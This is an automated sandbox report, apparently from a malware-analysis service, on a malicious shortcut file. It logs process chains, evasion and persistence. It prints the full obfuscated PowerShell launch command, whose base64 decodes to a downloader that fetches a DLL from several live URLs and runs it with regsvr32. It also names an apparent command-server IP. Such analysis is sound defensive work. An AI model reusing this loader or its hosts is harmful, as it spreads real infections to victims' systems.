Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013CCC48
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013CF4B4
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013BF0B0
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013CC0B0
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013CD4B0
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C04AC
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C8CAC
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C64AC
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B84A0
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B28F8
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C6CF8
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C00F0
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B7CEC
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B94D4
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C5B34
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B8B34
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013CAF24
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B770C
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013D3F78
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013BAF70
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B5F68
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013CDB5C
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B934C
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B4F4C
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013BFBAC
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013BCBA4
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013D038C
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B1FE0
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013CCFD8
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013BF7DC
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B1BD4
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C5FC8
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013D1608
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B660C
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B4278
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C6A78
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B7E7C
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B9A70
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C7A70
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013BAE6C
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C8660
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C0660
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C8258
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B4A5C
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B365C
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013BE650
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C3A4C
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B6244
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C8AA4
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013CC2FC
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013D4AFC
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013B26FC
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013D2AE4
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013C62CC
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_013BAAC8
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02C80000
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CED8E8
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CF2AE4
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE6CF8
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE8CAC
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CEA46C
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CEC860
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD3A18
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CDA014
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE4410
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE3438
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD4DFC
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CF038C
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CF19A0
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CDC108
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CF4508
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD2100
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE62CC
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CDAAC8
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD94D4
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD7CEC
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD26FC
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CEC2FC
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CF4AFC
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD28F8
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE00F0
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE64AC
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE04AC
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE8AA4
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD84A0
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CEF4B4
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CDF0B0
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CEC0B0
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CED4B0
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE3A4C
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CECC48
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD6244
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD4A5C
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD365C
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CF005C
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE8258
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CDE650
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CDAE6C
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE8660
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE0660
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CF1460
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD7E7C
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD4278
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE2C78
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE6A78
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD9A70
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE7A70
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD660C
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CF1608
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE9C10
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CF5028
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD1820
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE5FC8
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CDF7DC
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD75DC
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CEFDDC
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD89D8
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CECFD8
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD1BD4
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE0DE8
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CDB1E0
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD1FE0
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD4788
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CDDD80
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CDFBAC
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CF39AC
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CDD9A8
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CDCBA4
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CEA1A0
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE49A0
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD8DB4
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD59B0
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD934C
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD4F4C
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE9544
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CEDB5C
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CEAD54
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD6D50
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD5F68
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CF3F78
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CDAF70
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD770C
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CEBD1C
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CDB728
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CEAF24
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CD8B34
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE5B34
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CF5534
                  Source: GMOWDTRfIJ.xtq.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                  Source: 2022-04-26_1045.exe.lnkVirustotal: Detection: 32%
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Atpvfjzdexae\enxldhj.oxc"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                  Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtqJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Atpvfjzdexae\enxldhj.oxc"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220426Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ap2dulp.pbi.ps1Jump to behavior
                  Source: classification engineClassification label: mal100.troj.evad.winLNK@22/18@1/65
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CEC860 Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification,8_2_02CEC860
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3368:120:WilError_01
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180001034 LoadResource,LockResource,SizeofResource,6_2_0000000180001034
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

                  Data Obfuscation

                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2LyIsImh0dHA6Ly9kZW1vMzQuY2tnLmhrL3NlcnZpY2UvaGhNWnJmQzdNbm05SkQvIiwiaHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8iLCJodHRwOi8vY2lwcm8ubXgvcHJlbnNhL3NpWlA2OXJCRm1pYkR2dVRQMUwvIiwiaHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIvIiwiaHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2IvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL0dNT1dEVFJmSUoueHRxO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvR01PV0RUUmZJSi54dHE7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFC0111000B push ds; ret 0_2_00007FFC0111002C
                  Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_000000018000F00C GetModuleHandleA,LoadLibraryA,GetProcAddress,6_2_000000018000F00C
                  Source: GMOWDTRfIJ.xtq.2.dr | Static PE information: real checksum: 0x7e901 should be: 0x77673

                  Persistence and Installation Behavior

                  Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\GMOWDTRfIJ.xtq
                  Source: C:\Windows\System32\regsvr32.exe | File created: C:\Windows\System32\Atpvfjzdexae\enxldhj.oxc (copy)

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\System32\regsvr32.exe | File opened: C:\Windows\system32\Atpvfjzdexae\enxldhj.oxc:Zone.Identifier read attributes | delete
                  Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_000000018000C030 IsIconic,GetWindowPlacement,GetWindowRect,6_2_000000018000C030
                  Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_000000018000A74C IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,6_2_000000018000A74C
                  Source: C:\Windows\System32\regsvr32.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6620 | Thread sleep time: -16602069666338586s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6676 | Thread sleep count: 5295 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6728 | Thread sleep count: 36 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6728 | Thread sleep time: -33204139332677172s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672 | Thread sleep count: 4176 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6744 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 7008 | Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 5872 | Thread sleep time: -90000s >= -30000s
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: C:\Windows\System32\regsvr32.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_6-20226
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6912
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2680
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5295
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4176
                  Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
                  Source: C:\Windows\System32\regsvr32.exe | API coverage: 4.3 %
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                  Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE8CAC FindFirstFileW,FindNextFileW,FindClose,8_2_02CE8CAC
                  Source: C:\Windows\System32\regsvr32.exe | API call chain: ExitProcess graph end node graph_6-20228
                  Source: C:\Windows\System32\regsvr32.exe | File Volume queried: C:\ FullSizeInformation
                  Source: powershell.exe, 00000000.00000003.254657471.000002C31EC14000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: War&Prod_VMware_p
                  Source: regsvr32.exe, 00000008.00000002.518331169.00000000013A2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW]>
                  Source: svchost.exe, 00000011.00000002.519206225.000001ED94265000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "@Hyper-V RAW
                  Source: svchost.exe, 00000007.00000002.518135512.000002BE42602000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                  Source: regsvr32.exe, 00000008.00000002.518396758.00000000013D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.518462129.000001ED92C29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.519195636.000001ED94258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.446199582.00000278A3CEA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: svchost.exe, 00000014.00000002.446178458.00000278A3CD7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW+
                  Source: svchost.exe, 00000014.00000002.446035375.00000278A3C83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000002.00000002.304754429.000002A12F310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.518257058.000002BE4263E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.518416227.000001DA2963E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.518311662.0000012062E2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_000000018001FBE0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_000000018001FBE0
                  Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_000000018000F00C GetModuleHandleA,LoadLibraryA,GetProcAddress,6_2_000000018000F00C
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                  Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00000001800260BC RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001800260BC
                  Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0000000180021708 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0000000180021708

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\System32\regsvr32.exe | Network Connect: 138.201.142.73 8080
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtqJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
